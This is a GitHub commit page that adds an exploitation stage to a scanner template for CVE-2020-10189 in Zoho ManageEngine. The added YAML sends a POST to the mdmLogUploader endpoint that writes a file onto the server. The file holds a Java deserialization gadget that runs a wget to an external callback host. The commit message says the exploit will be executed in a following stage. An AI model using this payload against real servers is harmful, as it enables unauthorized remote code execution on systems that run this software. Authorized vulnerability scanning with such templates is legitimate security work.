Skip to content

Commit

Permalink
Add Stage 1
Browse files Browse the repository at this point in the history
Stage 1 is the arbitrary file write. This code creates a new file on
the Zoho ManageEngine server with our serialized exploit, which will be
executed in the next stage.
  • Loading branch information
king-alexander committed Apr 30, 2024
1 parent a58c003 commit 2ec9eeb
Showing 1 changed file with 15 additions and 0 deletions.
15 changes: 15 additions & 0 deletions http/cves/2020/CVE-2020-10189.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -13,6 +13,7 @@ info:
tags: cve,cve2020,kev

http:
# detect vulnerable version
- method: GET
path:
- "https://{{Host}}:8383/configurations.do"
Expand All @@ -38,3 +39,17 @@ http:
- type: dsl
dsl:
- compare_versions(version, '<10.0.474')
# arbitrary file write

Check failure on line 42 in http/cves/2020/CVE-2020-10189.yaml

View workflow job for this annotation

GitHub Actions / build

42:25 [trailing-spaces] trailing spaces
- method: POST
headers:
Content-Type: application/octet-stream
path:
# 'udid' is entirely attacker-controlled and 'logger.zip' is an allow-listed filename
- "https://{{Host}}:8383/mdm/client/v1/mdmLogUploader?udid={{rand_int()}}&filename=logger.zip"
# generate a serialized raw bytes payload
body: '{{generate_java_gadget("commons-collections3.1","wget http://{{interactsh-url}}","raw")}}'

matchers:
- type: status
status:
- 200

0 comments on commit 2ec9eeb

Please sign in to comment.